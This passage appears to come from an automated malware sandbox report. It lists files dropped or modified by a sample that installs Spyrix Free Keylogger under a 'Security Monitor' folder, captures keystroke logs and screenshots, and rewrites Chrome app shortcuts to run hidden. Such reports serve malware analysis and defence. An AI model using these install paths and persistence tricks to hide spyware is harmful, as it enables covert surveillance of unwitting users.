Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\logo.png (copy)
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\main.ico (copy)
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\offer.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.cmd (copy)
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sgw.m (copy)
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Air.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Android.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Charm.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Default.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\HUD.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\SnowLeopard.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Ubuntu.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\Win8.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\iOS4.skn (copy)
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-1G823.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-78BUT.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-AQ7SQ.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-IENIN.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-K27AM.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-MMUQD.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-SLKI9.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-TDORK.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\skins\is-U7M79.tmp
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spyrix.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-34584.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-KVJM4.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\is-N96TJ.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-1S4L6.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-IUA6J.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\temp\reg\ru\is-LO8O5.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\tmain.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.dat
|
InnoSetup Log Spyrix Free Keylogger 11.6.22, version 0x418, 231571 bytes, 320366\37\user\37, C:\ProgramData\Security Monitor\{827D21CC-
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 9, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 9
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\45567.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\logs\logs.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0091360301.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\45567.0091768171.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, components
3
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\scr\scr.dat
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\desktop\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:12:36 2024, mtime=Wed Oct 2 03:12:46 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini
|
Generic INItialization configuration [System]
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-9MMFB.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-SD2OR.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\is-SH1BS.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.dat (copy)
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.net (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\info.ttl (copy)
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-2BBC3.tmp
|
GIF image data, version 89a, 884 x 198
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-5JB4G.tmp
|
GIF image data, version 89a, 327 x 57
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\ru\is-GL6NF.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\runprg.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0,
Archive, ctime=Wed Oct 2 03:12:36 2024, mtime=Wed Oct 2 03:12:36 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\start\Uninstall Spyrix Free Keylogger.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive,
ctime=Wed Oct 2 03:12:35 2024, mtime=Wed Oct 2 03:12:35 2024, atime=Wed Oct 2 03:11:54 2024, length=1308909, window=hide
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156
|
ASCII text, with very long lines (426), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156
|
ASCII text, with very long lines (420), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_Run_First_C79C6F489015E0BC97F892E357DB7156
|
ASCII text, with very long lines (413), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\app_wizard_Start_C79C6F489015E0BC97F892E357DB7156
|
ASCII text, with very long lines (416), with no line terminators
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb
|
SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8,
version-valid-for 10
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REG3F6B.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\REG95D8.tmp
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qgsnw1d.3af.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pstvsra.bew.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2oyelmsj.gd5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rdgl13t.r3s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rfsgzlt.ifd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zhu2no2.iaq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aviv0d1.np4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdmr2xr2.jw2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjdkxr3d.rah.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmeu3oyt.xfz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bni1ewuh.asi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu30zysp.uni.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dezggigv.1vn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhgqfpnz.xrp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etpwzy1q.qzx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5olrizu.2og.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3bdmdtl.aio.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gf22wybw.5bd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqyd213x.1fv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzemshyw.3gi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhhf303o.vw5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyn1z5vk.bpc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzozcwxe.hlf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrrsj3yb.nhx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1iszat0.22q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3dlfxo4.3ja.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcbj4cra.ayk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkylyvok.hh5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpp4jtep.el0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw1pv0fq.qkl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me3y00uj.q44.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzslapqu.o1i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmbom2yc.omv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nueezh51.1v5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pneuaxv2.3ey.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pz4gbeao.mbq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwfagspn.n43.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry2nncu0.vhh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_savfznmk.r0u.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spvyfe2m.jqc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szzqmk0b.2ee.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u50vidua.i4k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfpm0fxm.ib1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w44pzcih.o1e.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wq140kky.xr5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xg05ce.1u4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbecxiiv.1dz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlajlgw0.zvt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l
|
ASCII text, with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\stld2.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\stld3.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\$ywr34c.tmp
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\iMsgInfo.bmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\psout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\psout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\sout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\sout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spmmout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spmmout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spsout
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\spsout_p
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nse
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\sfkname.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 03:13:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 636
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
|
downloaded
|
||
Chrome Cache Entry: 637
|
Java source, ASCII text, with very long lines (1184)
|
downloaded
|
||
Chrome Cache Entry: 638
|
Java source, ASCII text, with very long lines (1184)
|
dropped
|
||
Chrome Cache Entry: 639
|
Java source, ASCII text, with very long lines (522)
|
downloaded
|
||
Chrome Cache Entry: 640
|
ASCII text
|
dropped
|
||
Chrome Cache Entry: 641
|
Java source, ASCII text, with very long lines (612)
|
dropped
|
||
Chrome Cache Entry: 642
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 643
|
ASCII text, with very long lines (2465)
|
downloaded
|
||
Chrome Cache Entry: 644
|
ASCII text, with very long lines (773)
|
downloaded
|
||
Chrome Cache Entry: 645
|
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
Chrome Cache Entry: 646
|
Java source, ASCII text, with very long lines (3701)
|
downloaded
|
||
Chrome Cache Entry: 647
|
ASCII text, with very long lines (628)
|
dropped
|
||
Chrome Cache Entry: 648
|
Java source, ASCII text, with very long lines (612)
|
downloaded
|
||
Chrome Cache Entry: 649
|
ASCII text, with very long lines (1097)
|
dropped
|
||
Chrome Cache Entry: 650
|
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
|
dropped
|
||
Chrome Cache Entry: 651
|
ASCII text
|
downloaded
|
||
Chrome Cache Entry: 652
|
Java source, ASCII text, with very long lines (4588)
|
dropped
|
||
Chrome Cache Entry: 653
|
Java source, ASCII text, with very long lines (4588)
|
downloaded
|
||
Chrome Cache Entry: 654
|
Java source, ASCII text, with very long lines (1391)
|
dropped
|
||
Chrome Cache Entry: 655
|
ASCII text, with very long lines (773)
|
dropped
|
||
Chrome Cache Entry: 656
|
Java source, Unicode text, UTF-8 text, with very long lines (731)
|
downloaded
|
||
Chrome Cache Entry: 657
|
